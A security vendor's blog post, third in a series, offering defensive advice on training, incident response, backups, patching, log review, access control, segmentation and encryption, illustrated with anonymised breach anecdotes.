BLOG HOME > Cybersecurity > 2021 Data Breach Forensic Predictions and What Happened in 2020: Part 3

2021 Data Breach Forensic Predictions and What Happened in 2020: Part 3

Tips to avoid data breaches due to organizational vulnerabilities

The likelihood that a vulnerability will be exploited increases when proactive measures are not taken to continually address gaps in security.

Need Security Training for Your Team?

Start Here

Security awareness and training

Promoting security awareness and training are the top things you can do to address the largest security problem—employees. This can be a challenging task for two main reasons. First, it can be difficult to engage all employees, regardless of position or role in the company. However, company-wide participation in security awareness should be non-negotiable. 

In a recent data breach investigation, a Senior VP visited websites at home that introduced vulnerabilities onto his laptop through his home Wi-Fi. When he later logged into the corporate environment, the vulnerabilities were able to infiltrate the corporate systems. Everyone can be susceptible to threats. 

Second, security awareness covers a broad range of potential vulnerabilities that are both digital and physical. Even though security awareness can be difficult to initiate in your company, it is worth the effort to make security awareness and best security practices an integral part of your company culture. 

Additionally, you should teach your employees to challenge anything that seems out of the ordinary. In your employee training, specifically focus on identifying phishing attempts, social engineering attempts, spoofed emails, and other phishing campaigns. Phishing campaigns have become much more sophisticated in recent years, and employees need to know what they actually look like in the wild. 

Validation is a wise practice that is key to preventing phishing scams. Validate a message by using a different method of communication than the one you are validating. For example, if you are trying to validate an email, make a phone call, send a text or talk in person to discuss whether you might be targeted by a scammer. 

It may be appropriate to train on SMS texting scams, as these are becoming more popular. In a recent attack attempt, an employee was attempting to purchase an item from an online classified ad. The seller advised that he had sent the employee a “code” and asked the employee to verify his identity by sending the code back to the seller to “make sure he wasn’t a scammer.” The code the seller said that they sent the employee was actually the employee’s Google authentication code to log into his Google account. The employee’s first instinct was to be helpful and prove he was not a scammer, but luckily he realized he was being scammed.

It's easy to forget physical security, but it can be just as important as digital security. The security posture of a company is often transparent to those who know what to look for. For example, if a SecurityMetrics team arrives at a breached franchise location and the franchisee has not been notified by corporate management that we are coming, or if they immediately give us access to their computer systems without attempting to validate our authorization, it is a good indication that communication and security awareness is lacking. Excellent communication about security maintenance or tech maintenance needs to be best practice. 

Double-check with management when giving people access to locations or devices in your company. Simple tasks such as locking devices, proper storage and disposal of physical data, and limited access to buildings or building hours can be other ways to encourage good security practices. Since personal devices and BYOD policies are more common, security awareness is more important than ever to protect your company’s network and data. 

Incident response training

Develop and update formal written policies and procedures for incident response (IR) at your company. These policies are essential to employees in the case of a suspected data breach incident and also to responders who are working to manage the incident. You need to identify members of the Incident Response Team, train them on their individual roles in the event of a suspected breach, and then test your IR team with mock drills that are based on scenarios that could affect your network or systems. The benefit of maintaining a trained incident response team is that you can test your security and find gaps before experiencing a threat or an attack on your assets.  

Test your incident response plan with tabletop exercises that push your incident response plan from start to finish, so you can gain the most insight on the process and then apply what you learn to your plan, where the plan ends, and if it has gaps or holes. 

Have your Incident Response Team run a regular drill that involves restoring data from backups.  Evaluate your ability to restore your systems from backups (this is especially useful when attempting to recover from a ransomware attack).  Find out what data did not recover, or other difficulties experienced during the exercise, and then work to remedy these during “peace time” so that if you ever have the misfortune of falling victim to a ransomware attack, your IR Team will be prepared to restore your systems without having to deal with the attackers.

In a recent ransomware attack, it took a company three days to restore from backups. Those three days cost the company tens of millions of dollars in revenue because they could not accept credit cards across hundreds of their stores. Backups are critical in all aspects of your business. 

Unplug the cords on your backups except when they are actively performing a backup. In many of our ransomware cases, we found that the backup was also infected with the ransomware. Make sure your backup is not connected full-time to your network. 

Updates and patches

Neglecting security updates and patches can lead to serious issues. It’s critical to never let anything enter a sunset date.  In recent years hundreds of  businesses have suffered data breaches as a result of failing to update their ecommerce software with security patches that were released by the provider, but never installed. 

The remedy was available--those breaches, that cost the businesses tens of thousands of dollars, should not have happened.

Vulnerability scans and pen tests

Proper security testing can help you identify problems in advance. Penetration testing and Vulnerability scans (ASVs) are required in credit card processing industries and are part of a robust, layered security approach.

Configure and review logs

Logs have the potential to be helpful in preventing data breaches, but to be effective, they require consistent vigilance. Failure to review security logs allows breaches to go unnoticed much longer. 

SecurityMetrics had a case where a company used a sophisticated IDS system, which was working well. At one point, the IDS system started issuing intrusion alerts, but no one at the company was reviewing them. What should have been a one-day breach ended up spreading across 800 locations and went undetected for 9 months. Companies should assign someone to  review security logs on a regular basis. Even better is to have an automated alert notification texted to the responsible individual for high-level events.

Normalcy bias can also be an issue: Employees sometimes assume that there are not any indicators of breaches in the log, because they haven’t seen any previously.  This is often because employees are not trained well enough to know how to spot discrepancies. Many times in an investigation, we find evidence of the data breach in the logs, and we present it to the company. They simply did not have the skills to recognize that an attack was happening. 

Keeping a trained employee in charge of reviewing the logs is essential to detecting security breaches early on. 

Passwords and account credentials

Hardened passwords continue to be important, but the username can also create a security weakness.  Avoid usernames like, Admin or Administrator, as it gives an attacker 50% of the credentials they need to breach your system.  Attackers will always attempt to breach the password for the user account ‘Admin.’  

Passwords should be complex, long, and contain several special characters. However, strong passwords alone do not ensure security. Multi-factor authentication should be considered a requirement in your network.  Even though hackers occasionally find some way around it, multi-factor authentication is still one of the best ways to increase access security. 

Role-based access

A CEO, most members of the C-Suite, or Sr. VPs probably do not need admin-level access. They may ask for it and believe they do, but for their job functions, they likely don’t. When configuring access, review the question “Does this person need access to this to do their job?” If the answer to this is no, don’t give access.

Role-based access can refer to data stored in a system that has to do with group policies, but it actually extends even further.  As we have shifted to online meetings, role-based access must have a much more organic meaning. Are all the meeting attendees supposed to be there? Does their role allow them to be there? Are there unknown attendees calling in from cell phones? The role of the meeting moderator is critical in questioning who is in the meeting, why they are there, and taking action if something seems suspicious. 

Network segmentation

The days of thinking of security as a moat around a castle are gone. It is critical that you segment your sensitive information and corporate secrets into the smallest areas possible. This information needs to have the smallest footprint possible to surround it with the most specialized security available.

In zero-trust networks, segmentation is oftentimes hardware based. Zero-trust networks are more of a policy or software based network segmentation. 

Even if you are using cloud services, you need to segment your part of the castle. If you have sensitive files in the cloud, ensure they are encrypted, or otherwise protected with other elevated security protocols.

Encryption and backup

Securing your data is critical to your business, therefore you should encrypt as much of it as is practical. The goal is to make it difficult or impossible for the hacker to use information they might capture. Encryption is required for credit card numbers, but should also be used in other cases as well (e.g., protected health information, personally identifiable information). 

One last security recommendation: Addressing ecommerce shopping cart attacks

We have seen increasing sophistication with JavaScript code injection in the e-commerce shopping cart environment. There are very few tools on the market that can help with this issue and manually searching website code requires training and expertise. 

In one e-commerce skimming investigation, we observed over 250 legitimate connections occurring during the shopping cart and check out process. Since then, our team has worked together to create a patented tool that can address the complexity of a dynamic shopping cart environment and help merchants stop credit card skimming. 

If you haven’t already, check out part 1 and part 2 of this series for more insight on 2020 and best practices for cybersecurity. 


By: David Ellis
VP, Investigations
CISSP, QSA, PFI